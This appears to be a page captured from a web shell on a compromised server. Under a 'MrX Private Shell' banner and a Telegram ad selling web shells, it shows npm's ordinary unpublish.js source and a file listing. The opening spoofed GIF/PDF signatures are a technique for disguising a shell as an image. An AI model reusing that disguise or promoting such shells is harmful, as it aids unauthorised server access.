GIF89; GIF89; %PDF- %PDF-
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
const libaccess = require('libnpmaccess')
const libunpub = require('libnpmpublish').unpublish
const npa = require('npm-package-arg')
const pacote = require('pacote')
const { output, log } = require('proc-log')
const pkgJson = require('@npmcli/package-json')
const { flatten } = require('@npmcli/config/lib/definitions')
const getIdentity = require('../utils/get-identity.js')
const { otplease } = require('../utils/auth.js')
const BaseCommand = require('../base-cmd.js')
const LAST_REMAINING_VERSION_ERROR = 'Refusing to delete the last version of the package. ' +
'It will block from republishing a new version for 24 hours.\n' +
'Run with --force to do this.'
class Unpublish extends BaseCommand {
static description = 'Remove a package from the registry'
static name = 'unpublish'
static params = ['dry-run', 'force', 'workspace', 'workspaces']
static usage = ['[<package-spec>]']
static workspaces = true
static ignoreImplicitWorkspace = false
static async getKeysOfVersions (name, opts) {
const packument = await pacote.packument(name, {
...opts,
spec: name,
query: { write: true },
})
return Object.keys(packument.versions)
}
static async completion (args, npm) {
const { partialWord, conf } = args
if (conf.argv.remain.length >= 3) {
return []
}
const opts = { ...npm.flatOptions }
const username = await getIdentity(npm, { ...opts }).catch(() => null)
if (!username) {
return []
}
const access = await libaccess.getPackages(username, opts)
// do a bit of filtering at this point, so that we don't need
// to fetch versions for more than one thing, but also don't
// accidentally unpublish a whole project
let pkgs = Object.keys(access)
if (!partialWord || !pkgs.length) {
return pkgs
}
const pp = npa(partialWord).name
pkgs = pkgs.filter(p => !p.indexOf(pp))
if (pkgs.length > 1) {
return pkgs
}
const versions = await Unpublish.getKeysOfVersions(pkgs[0], opts)
if (!versions.length) {
return pkgs
} else {
return versions.map(v => `${pkgs[0]}@${v}`)
}
}
async exec (args, { localPrefix } = {}) {
if (args.length > 1) {
throw this.usageError()
}
// workspace mode
if (!localPrefix) {
localPrefix = this.npm.localPrefix
}
const force = this.npm.config.get('force')
const { silent } = this.npm
const dryRun = this.npm.config.get('dry-run')
let spec
if (args.length) {
spec = npa(args[0])
if (spec.type !== 'version' && spec.rawSpec !== '*') {
throw this.usageError(
'Can only unpublish a single version, or the entire project.\n' +
'Tags and ranges are not supported.'
)
}
}
log.silly('unpublish', 'args[0]', args[0])
log.silly('unpublish', 'spec', spec)
if (spec?.rawSpec === '*' && !force) {
throw this.usageError(
'Refusing to delete entire project.\n' +
'Run with --force to do this.'
)
}
const opts = { ...this.npm.flatOptions }
let manifest
try {
const { content } = await pkgJson.prepare(localPrefix)
manifest = content
} catch (err) {
if (err.code === 'ENOENT' || err.code === 'ENOTDIR') {
if (!spec) {
// We needed a local package.json to figure out what package to
// unpublish
throw this.usageError()
}
} else {
// folks should know if ANY local package.json had a parsing error.
// They may be relying on `publishConfig` to be loading and we don't
// want to ignore errors in that case.
throw err
}
}
let pkgVersion // for cli output
if (spec) {
pkgVersion = spec.type === 'version' ? `@${spec.rawSpec}` : ''
} else {
spec = npa.resolve(manifest.name, manifest.version)
log.verbose('unpublish', manifest)
pkgVersion = manifest.version ? `@${manifest.version}` : ''
if (!manifest.version && !force) {
throw this.usageError(
'Refusing to delete entire project.\n' +
'Run with --force to do this.'
)
}
}
// If localPrefix has a package.json with a name that matches the package
// being unpublished, load up the publishConfig
if (manifest?.name === spec.name && manifest.publishConfig) {
const cliFlags = this.npm.config.data.get('cli').raw
// Filter out properties set in CLI flags to prioritize them over
// corresponding `publishConfig` settings
const filteredPublishConfig = Object.fromEntries(
Object.entries(manifest.publishConfig).filter(([key]) => !(key in cliFlags)))
flatten(filteredPublishConfig, opts)
}
const versions = await Unpublish.getKeysOfVersions(spec.name, opts)
if (versions.length === 1 && spec.rawSpec === versions[0] && !force) {
throw this.usageError(LAST_REMAINING_VERSION_ERROR)
}
if (versions.length === 1) {
pkgVersion = ''
}
if (!dryRun) {
await otplease(this.npm, opts, o => libunpub(spec, o))
}
if (!silent) {
output.standard(`- ${spec.name}${pkgVersion}`)
}
}
async execWorkspaces (args) {
await this.setWorkspaces()
for (const path of this.workspacePaths) {
await this.exec(args, { localPrefix: path })
}
}
}
module.exports = Unpublish
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| access.js | File | 6.04 KB | 0644 |
|
| adduser.js | File | 1.29 KB | 0644 |
|
| audit.js | File | 3.15 KB | 0644 |
|
| bugs.js | File | 847 B | 0644 |
|
| cache.js | File | 7.12 KB | 0644 |
|
| ci.js | File | 4.22 KB | 0644 |
|
| completion.js | File | 8.9 KB | 0644 |
|
| config.js | File | 11.18 KB | 0644 |
|
| dedupe.js | File | 1.41 KB | 0644 |
|
| deprecate.js | File | 2.13 KB | 0644 |
|
| diff.js | File | 8 KB | 0644 |
|
| dist-tag.js | File | 5.52 KB | 0644 |
|
| docs.js | File | 449 B | 0644 |
|
| doctor.js | File | 10.1 KB | 0644 |
|
| edit.js | File | 1.76 KB | 0644 |
|
| exec.js | File | 3.42 KB | 0644 |
|
| explain.js | File | 3.58 KB | 0644 |
|
| explore.js | File | 2.16 KB | 0644 |
|
| find-dupes.js | File | 634 B | 0644 |
|
| fund.js | File | 6.46 KB | 0644 |
|
| get.js | File | 577 B | 0644 |
|
| help-search.js | File | 5.52 KB | 0644 |
|
| help.js | File | 3.66 KB | 0644 |
|
| hook.js | File | 3.37 KB | 0644 |
|
| init.js | File | 6.85 KB | 0644 |
|
| install-ci-test.js | File | 373 B | 0644 |
|
| install-test.js | File | 370 B | 0644 |
|
| install.js | File | 5.15 KB | 0644 |
|
| link.js | File | 5.25 KB | 0644 |
|
| ll.js | File | 234 B | 0644 |
|
| login.js | File | 1.29 KB | 0644 |
|
| logout.js | File | 1.42 KB | 0644 |
|
| ls.js | File | 16.81 KB | 0644 |
|
| org.js | File | 4.02 KB | 0644 |
|
| outdated.js | File | 7.7 KB | 0644 |
|
| owner.js | File | 5.85 KB | 0644 |
|
| pack.js | File | 2.6 KB | 0644 |
|
| ping.js | File | 873 B | 0644 |
|
| pkg.js | File | 3.56 KB | 0644 |
|
| prefix.js | File | 335 B | 0644 |
|
| profile.js | File | 10.57 KB | 0644 |
|
| prune.js | File | 799 B | 0644 |
|
| publish.js | File | 7.38 KB | 0644 |
|
| query.js | File | 3.51 KB | 0644 |
|
| rebuild.js | File | 2.19 KB | 0644 |
|
| repo.js | File | 1.25 KB | 0644 |
|
| restart.js | File | 310 B | 0644 |
|
| root.js | File | 295 B | 0644 |
|
| run-script.js | File | 6.08 KB | 0644 |
|
| sbom.js | File | 4.51 KB | 0644 |
|
| search.js | File | 1.83 KB | 0644 |
|
| set.js | File | 671 B | 0644 |
|
| shrinkwrap.js | File | 2.65 KB | 0644 |
|
| star.js | File | 1.87 KB | 0644 |
|
| stars.js | File | 1.03 KB | 0644 |
|
| start.js | File | 300 B | 0644 |
|
| stop.js | File | 295 B | 0644 |
|
| team.js | File | 4.36 KB | 0644 |
|
| test.js | File | 295 B | 0644 |
|
| token.js | File | 6.02 KB | 0644 |
|
| uninstall.js | File | 1.52 KB | 0644 |
|
| unpublish.js | File | 5.27 KB | 0644 |
|
| unstar.js | File | 183 B | 0644 |
|
| update.js | File | 1.72 KB | 0644 |
|
| version.js | File | 3.54 KB | 0644 |
|
| view.js | File | 12.8 KB | 0644 |
|
| whoami.js | File | 527 B | 0644 |
|